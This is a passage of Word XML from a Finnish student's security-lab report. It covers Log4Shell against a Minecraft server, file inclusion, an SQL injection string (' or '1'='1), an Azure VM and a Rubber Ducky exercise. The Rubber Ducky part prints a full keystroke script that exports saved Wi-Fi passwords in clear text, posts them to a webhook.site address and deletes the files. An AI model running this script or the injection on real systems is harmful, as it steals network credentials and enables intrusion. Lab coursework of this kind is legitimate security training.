        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D52AABE" w14:textId="7EB6D0C8" w:rsidR="00095B4C" w:rsidRPr="006D68D8" w:rsidRDefault="00095B4C" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03233CB0" w14:textId="77777777" w:rsidR="005B342D" w:rsidRPr="006D68D8" w:rsidRDefault="005B342D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DCE2F12" w14:textId="77777777" w:rsidR="005B342D" w:rsidRDefault="005B342D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFA31B4" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRDefault="00765D7E" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058D2EEF" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRDefault="00765D7E" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290F21FF" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRPr="006D68D8" w:rsidRDefault="00765D7E" w:rsidP="00765D7E">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc184118569"/>
      <w:bookmarkStart w:id="8" w:name="_Toc184118643"/>
      <w:bookmarkStart w:id="9" w:name="_Toc184118710"/>
      <w:bookmarkStart w:id="10" w:name="_Toc185288618"/>
      <w:r w:rsidRPr="006D68D8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tehtävä 6. Tiedoston lataaminen tietokoneelta</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="10FDA98F" w14:textId="77777777" w:rsidR="00765D7E" w:rsidRDefault="00765D7E" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C78D0EE" w14:textId="36828FA8" w:rsidR="00FF443D" w:rsidRPr="00FF443D" w:rsidRDefault="00FF443D" w:rsidP="0078295A">
      <w:pPr>
        <w:pStyle w:val="Lhteet-otsikko"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc184118570"/>
      <w:bookmarkStart w:id="12" w:name="_Toc184118644"/>
      <w:bookmarkStart w:id="13" w:name="_Toc184118711"/>
      <w:bookmarkStart w:id="14" w:name="_Toc185288619"/>
      <w:r w:rsidRPr="00FF443D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49CE040F" wp14:editId="4DB8019F">
            <wp:extent cx="5292090" cy="2802890"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="110672374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23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bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="14A3483A" w14:textId="2771BE10" w:rsidR="00627234" w:rsidRDefault="00310BC4" w:rsidP="00C9470C">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:r w:rsidRPr="0024249E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Toc185288620"/>
      <w:r w:rsidR="00C9470C">
        <w:lastRenderedPageBreak/>
        <w:t>Logshell hakkerointi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5E2E28F6" w14:textId="77777777" w:rsidR="00DF3E4B" w:rsidRDefault="00DF3E4B" w:rsidP="00DF3E4B"/>
    <w:p w14:paraId="2F3BD43B" w14:textId="77777777" w:rsidR="00F572BD" w:rsidRDefault="00F572BD" w:rsidP="00DF3E4B"/>
    <w:p w14:paraId="1FCD612D" w14:textId="20442396" w:rsidR="00F572BD" w:rsidRPr="00DF3E4B" w:rsidRDefault="00EA0DA9" w:rsidP="00DF3E4B">
      <w:r>
        <w:t>Suoritin nmap</w:t>
      </w:r>
      <w:r w:rsidR="004363BF">
        <w:t>, josta serveri löytyi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A4ED1" w14:textId="05CED166" w:rsidR="002E1B90" w:rsidRDefault="00F572BD" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00F572BD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A43F4EB" wp14:editId="022D6E02">
            <wp:extent cx="5292090" cy="3432810"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1885631924" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, ruokalis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31924" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, ruokalista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E673" w14:textId="33AA2E0C" w:rsidR="002E1B90" w:rsidRDefault="004363BF" w:rsidP="002E1B90">
      <w:r>
        <w:t>Client auki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD434F" w14:textId="52D07E9A" w:rsidR="00E96D4D" w:rsidRDefault="000F7B43" w:rsidP="002E1B90">
      <w:r w:rsidRPr="000F7B43">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2395ACF8" wp14:editId="1A9198D2">
            <wp:extent cx="5292090" cy="3615690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="366498239" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, PC-peli, Videopeliohjelmisto, 3D-mallinn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98239" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, PC-peli, Videopeliohjelmisto, 3D-mallinnus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BE3B" w14:textId="5ADE9A03" w:rsidR="000F7B43" w:rsidRDefault="00BD4BC3" w:rsidP="002E1B90">
      <w:r>
        <w:t>kirjoitin server ip-osoitteeksi 192.168.163.149.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A68FDC4" w14:textId="35826B01" w:rsidR="0077054E" w:rsidRDefault="00693050" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00693050">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="674FD995" wp14:editId="05826926">
            <wp:extent cx="5292090" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="3810" b="9525"/>
            <wp:docPr id="58749960" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Multimediaohjelmist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960" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Multimediaohjelmisto, ohjelmisto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48A0" w14:textId="104C541C" w:rsidR="00426EE4" w:rsidRDefault="00426EE4" w:rsidP="002E1B90">
      <w:r>
        <w:t>Pääsin peliin sisään</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E78623" w14:textId="459159DA" w:rsidR="00426EE4" w:rsidRDefault="00426EE4" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00426EE4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7430D4DD" wp14:editId="0275C6D8">
            <wp:extent cx="5292090" cy="3195320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="371942585" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teksti, Multimediaohjelmisto, Grafiikk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2585" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, teksti, Multimediaohjelmisto, Grafiikkaohjelmisto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78C2" w14:textId="38A45BB8" w:rsidR="00E96D4D" w:rsidRDefault="00CE2780" w:rsidP="002E1B90">
      <w:r>
        <w:t xml:space="preserve">Ldap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B4FA3" w14:textId="3326A981" w:rsidR="00E96D4D" w:rsidRDefault="00693050" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00693050">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4187DC" wp14:editId="14C4976E">
            <wp:extent cx="5292090" cy="490220"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5080"/>
            <wp:docPr id="140899772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977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C219" w14:textId="77777777" w:rsidR="00CC0074" w:rsidRDefault="00CC0074" w:rsidP="002E1B90"/>
    <w:p w14:paraId="122647BC" w14:textId="77777777" w:rsidR="00275083" w:rsidRDefault="00275083" w:rsidP="002E1B90"/>
    <w:p w14:paraId="2F370D3D" w14:textId="2ABB5560" w:rsidR="00BF07AB" w:rsidRDefault="00BF07AB" w:rsidP="002E1B90">
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0BCAC" w14:textId="5475924A" w:rsidR="00C100EE" w:rsidRDefault="00C100EE" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00C100EE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7A00F1" wp14:editId="5E4A2121">
            <wp:extent cx="5292090" cy="1517650"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="1913520275" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, tie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20275" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, tieto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BCC2" w14:textId="5CE5E633" w:rsidR="00E96D4D" w:rsidRDefault="00E96D4D" w:rsidP="002E1B90"/>
    <w:p w14:paraId="79280724" w14:textId="1D242780" w:rsidR="00275083" w:rsidRDefault="00BF07AB" w:rsidP="002E1B90">
      <w:r>
        <w:t>Netcat shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55D687" w14:textId="42BA436F" w:rsidR="00413ED8" w:rsidRPr="00413ED8" w:rsidRDefault="00413ED8" w:rsidP="002E1B90">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00413ED8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EB9CCDE" wp14:editId="5ED2490E">
            <wp:extent cx="5292090" cy="1521460"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="1003461244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1244" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti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93F3" w14:textId="0C76C9AC" w:rsidR="00275083" w:rsidRDefault="00275083" w:rsidP="002E1B90"/>
    <w:p w14:paraId="345A123E" w14:textId="02343252" w:rsidR="008B6F0B" w:rsidRDefault="008B6F0B" w:rsidP="002E1B90">
      <w:r>
        <w:t xml:space="preserve">Loppu tehtävää en saanut </w:t>
      </w:r>
      <w:r w:rsidR="00063094">
        <w:t>tehtyä.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7EFFB" w14:textId="643C06C9" w:rsidR="00EE2E06" w:rsidRDefault="009F12E9" w:rsidP="002E1B90">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc185288621"/>
      <w:r>
        <w:t>Virtuaalikone</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="32D6ECD7" w14:textId="060BF0AA" w:rsidR="000B1110" w:rsidRPr="000B1110" w:rsidRDefault="000B1110" w:rsidP="000B1110">
      <w:r>
        <w:t xml:space="preserve">Kolme konetta </w:t>
      </w:r>
      <w:r w:rsidR="00CB5DC7">
        <w:t>liitetty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> yhteen kytkimeen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBAC443" w14:textId="57080A64" w:rsidR="005E7ACE" w:rsidRDefault="005E7ACE" w:rsidP="005E7ACE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34307">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A83862D" wp14:editId="5E3E4B98">
            <wp:extent cx="5292090" cy="2374265"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="658916137" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, viiva, Värikkyy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84973" name="Kuva 1" descr="Kuva, joka sisältää kohteen kuvakaappaus, viiva, Värikkyys&#10;&#10;Kuvaus luotu automaattisesti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A0FA" w14:textId="131C56CB" w:rsidR="006D4C44" w:rsidRPr="000B1110" w:rsidRDefault="000B1110" w:rsidP="005E7ACE">
      <w:r w:rsidRPr="000B1110">
        <w:t>Ping toimii koneiden välillä</w:t>
      </w:r>
      <w:r w:rsidR="00CB5DC7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAED7F7" w14:textId="75CE1936" w:rsidR="005E7ACE" w:rsidRDefault="005E7ACE" w:rsidP="005E7ACE">
      <w:r w:rsidRPr="005E7ACE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAA2C97" wp14:editId="2C638A29">
            <wp:extent cx="5191850" cy="1305107"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="2051140051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40051" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti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FF8A" w14:textId="77777777" w:rsidR="006D4C44" w:rsidRDefault="006D4C44" w:rsidP="005E7ACE"/>
    <w:p w14:paraId="0B6CF66D" w14:textId="753D7B45" w:rsidR="006D4C44" w:rsidRPr="005E7ACE" w:rsidRDefault="006D4C44" w:rsidP="005E7ACE">
      <w:r w:rsidRPr="006D4C44">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52AF0C69" wp14:editId="51ED34F4">
            <wp:extent cx="5068007" cy="1190791"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="721882336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82336" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti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DE0B" w14:textId="77777777" w:rsidR="00F40C7D" w:rsidRDefault="00F40C7D" w:rsidP="002E1B90"/>
    <w:p w14:paraId="24E3DD19" w14:textId="5561E186" w:rsidR="00F40C7D" w:rsidRDefault="00F40C7D" w:rsidP="002E1B90"/>
    <w:p w14:paraId="57F5A87A" w14:textId="500695E8" w:rsidR="000161E3" w:rsidRDefault="00D83BEE" w:rsidP="002E1B90">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc185288622"/>
      <w:r>
        <w:t>Hackstructor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="19D78041" w14:textId="49763C57" w:rsidR="00F40C7D" w:rsidRDefault="00DB4D43" w:rsidP="002E1B90">
      <w:r>
        <w:t>File inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BBFF8C" w14:textId="290DFC04" w:rsidR="000161E3" w:rsidRDefault="000161E3" w:rsidP="002E1B90"/>
    <w:p w14:paraId="4D81DBF2" w14:textId="5FC02C2E" w:rsidR="00B4527C" w:rsidRDefault="00B4527C" w:rsidP="002E1B90">
      <w:r>
        <w:t xml:space="preserve">File inclusionissa </w:t>
      </w:r>
      <w:r w:rsidR="0000359E">
        <w:t>kopioin filepath:in kuvasta</w:t>
      </w:r>
      <w:r w:rsidR="00C50024">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96CED7" w14:textId="3538FFA8" w:rsidR="00F40C7D" w:rsidRDefault="00995F4C" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00995F4C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66B4A0CE" wp14:editId="182B389D">
            <wp:extent cx="5292090" cy="664210"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="1093663709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3709" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti&#10;&#10;Kuvaus luotu automaattisesti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886" w14:textId="6F886CBB" w:rsidR="00DB4D43" w:rsidRDefault="00C50024" w:rsidP="002E1B90">
      <w:r>
        <w:t>Testauksen jälkeen huomasin, että sivua ei ole suojattu sitä vastaan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E172566" w14:textId="65A6F8F7" w:rsidR="00DB4D43" w:rsidRDefault="000916BC" w:rsidP="002E1B90">
      <w:r w:rsidRPr="000916BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51AA108B" wp14:editId="3EFADB1C">
            <wp:extent cx="5292090" cy="2586355"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="555137849" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus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37849" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, muotoilu&#10;&#10;Kuvaus luotu automaattisesti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08B2" w14:textId="77777777" w:rsidR="002D7858" w:rsidRDefault="002D7858" w:rsidP="002E1B90"/>
    <w:p w14:paraId="0E999706" w14:textId="227D4738" w:rsidR="00292CAF" w:rsidRDefault="002D7858" w:rsidP="002E1B90">
      <w:r>
        <w:t xml:space="preserve">Sql injektio </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C03747" w14:textId="702D44FB" w:rsidR="002D7858" w:rsidRDefault="002D7858" w:rsidP="002E1B90"/>
    <w:p w14:paraId="289BAA09" w14:textId="54A3EE9E" w:rsidR="003B5784" w:rsidRDefault="003B5784" w:rsidP="002E1B90"/>
    <w:p w14:paraId="527E9C52" w14:textId="4D1BC9F0" w:rsidR="00B43C33" w:rsidRPr="00776132" w:rsidRDefault="00776132" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00776132">
        <w:t>’ or ’1’=’1 avulla sa</w:t>
      </w:r>
      <w:r>
        <w:t>adaan käyttäjä nimi ja salasana selville.</w:t>
      </w:r>
      <w:r w:rsidR="003B5784">
        <w:t xml:space="preserve"> Jos 1=1 on oikea lauseke </w:t>
      </w:r>
      <w:r w:rsidR="004E643F">
        <w:t>se suoritta komennon ja saat kuvassa olevan taulukon tiedot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F92F1FC" w14:textId="79EE9C35" w:rsidR="00B43C33" w:rsidRDefault="00B43C33" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00B43C33">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51EB8FF8" wp14:editId="635C9FC6">
            <wp:extent cx="5292090" cy="1757680"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="509806770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06770" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, numero&#10;&#10;Kuvaus luotu automaattisesti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EFA5" w14:textId="77777777" w:rsidR="009A314B" w:rsidRDefault="009A314B" w:rsidP="002E1B90"/>
    <w:p w14:paraId="795019AD" w14:textId="2AD0069D" w:rsidR="009A314B" w:rsidRDefault="009A314B" w:rsidP="002E1B90"/>
    <w:p w14:paraId="46079D82" w14:textId="24F0515C" w:rsidR="009A314B" w:rsidRDefault="00CF4DA7" w:rsidP="00CF4DA7">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc185288623"/>
      <w:r>
        <w:t>Azure Cloud</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1800CC65" w14:textId="377C63AF" w:rsidR="00CC7B7A" w:rsidRPr="00CC7B7A" w:rsidRDefault="00662045" w:rsidP="00CC7B7A">
      <w:r>
        <w:t xml:space="preserve">Loin virtuaalikoneen ohjeiden mukaisesti: windows 10 pro, </w:t>
      </w:r>
      <w:r w:rsidR="006823A1">
        <w:t xml:space="preserve">B1s ja North Europe. Loin admin tunnukset ja valitsin portit 80 ja 3389. </w:t>
      </w:r>
      <w:r w:rsidR="009D05E0">
        <w:t>Käynnistin virtuaalikoneen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007A716" w14:textId="18333DC1" w:rsidR="009A314B" w:rsidRDefault="009A314B" w:rsidP="002E1B90">
      <w:r w:rsidRPr="009A314B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00D4E584" wp14:editId="648FA415">
            <wp:extent cx="5292090" cy="2931795"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="735222808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22808" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, ohjelmisto, Tietokonekuvake&#10;&#10;Kuvaus luotu automaattisesti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E7E9" w14:textId="31BF1EC5" w:rsidR="00071698" w:rsidRDefault="00B4527C" w:rsidP="002E1B90">
      <w:r>
        <w:t>Kuvakaappaus virtuaalikoneen toiminnasta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31995D36" w14:textId="58099588" w:rsidR="00071698" w:rsidRDefault="00071698" w:rsidP="002E1B90">
      <w:r w:rsidRPr="00071698">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BA5C2D" wp14:editId="7526885C">
            <wp:extent cx="5292090" cy="3926840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="136081424" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, taivas, pilv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424" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, taivas, pilvi, kuvakaappaus&#10;&#10;Kuvaus luotu automaattisesti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03F" w14:textId="77777777" w:rsidR="00D34307" w:rsidRDefault="00D34307" w:rsidP="002E1B90"/>
    <w:p w14:paraId="0659890C" w14:textId="406D1908" w:rsidR="00D34307" w:rsidRDefault="00E37948" w:rsidP="00E37948">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc185288624"/>
      <w:r>
        <w:t>Rubber ducky</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="01A0C589" w14:textId="41F71E8E" w:rsidR="00B572C2" w:rsidRDefault="00266D34" w:rsidP="00E37948">
      <w:r>
        <w:t xml:space="preserve">Ensin latasin ruber ducky-kooderin. </w:t>
      </w:r>
      <w:r w:rsidR="00126CE5">
        <w:t xml:space="preserve">Laitoin Rubber ducky usb tikun kiinni tietokoneeseen, </w:t>
      </w:r>
      <w:r w:rsidR="001938A3">
        <w:t xml:space="preserve">jota käytetään scriptin suorittamisessa. </w:t>
      </w:r>
      <w:r w:rsidR="00F6035C">
        <w:t>Koit</w:t>
      </w:r>
      <w:r w:rsidR="00831DF5">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00F6035C">
        <w:t xml:space="preserve">hakkeroida wifin-salasanoja. </w:t>
      </w:r>
      <w:r w:rsidR="00B572C2">
        <w:t xml:space="preserve">Kun kooderi on </w:t>
      </w:r>
      <w:r w:rsidR="00584BFD">
        <w:t>asennettu,</w:t>
      </w:r>
      <w:r w:rsidR="00B572C2">
        <w:t xml:space="preserve"> pistetään microsd</w:t>
      </w:r>
      <w:r w:rsidR="0087096F">
        <w:t xml:space="preserve"> kortti koneeseen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF2A2F" w14:textId="77777777" w:rsidR="004E643F" w:rsidRDefault="004E643F" w:rsidP="00E37948"/>
    <w:p w14:paraId="20C7BE72" w14:textId="1BEA94A0" w:rsidR="008A03FA" w:rsidRDefault="00B94F3B" w:rsidP="00E37948">
      <w:r>
        <w:t xml:space="preserve">Koodi </w:t>
      </w:r>
      <w:r w:rsidR="00AD0439">
        <w:t>hakkeroi wifin tallennettuja salasanoja.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EECFA88" w14:textId="77777777" w:rsidR="008A03FA" w:rsidRPr="00AD0439" w:rsidRDefault="008A03FA" w:rsidP="008A03FA">
      <w:r w:rsidRPr="00AD0439">
        <w:t>DELAY 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453F5A4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STRING cmd /k mode con: cols=25 lines=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3403844C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DELAY 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F72AC9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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763105F5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DELAY 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE76E6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STRING cd %temp%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E428CE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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE12BE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DELAY 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21EDCD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STRING netsh wlan export profile key=clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AC7EBB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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B869AAF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DELAY 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E901BD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STRING powershell Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' &gt; WiFi-Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4AB84" w14:textId="77777777" w:rsidR="008A03FA" w:rsidRDefault="008A03FA" w:rsidP="008A03FA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364CA75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DELAY 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7CCBD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DELAY 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22362729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REM next command will post wifi password on webhook.site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13E808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STRING powershell Invoke-WebRequest -Uri https://webhook.site/&lt;paste webhook unique id here&gt; -Method POST -InFile WiFi-Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB93BDE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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A9FFF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STRING del Wi* /s/f/q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418C64A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ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557BD7C1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DELAY 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10DCE9" w14:textId="77777777" w:rsidR="008A03FA" w:rsidRPr="008A03FA" w:rsidRDefault="008A03FA" w:rsidP="008A03FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A03FA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
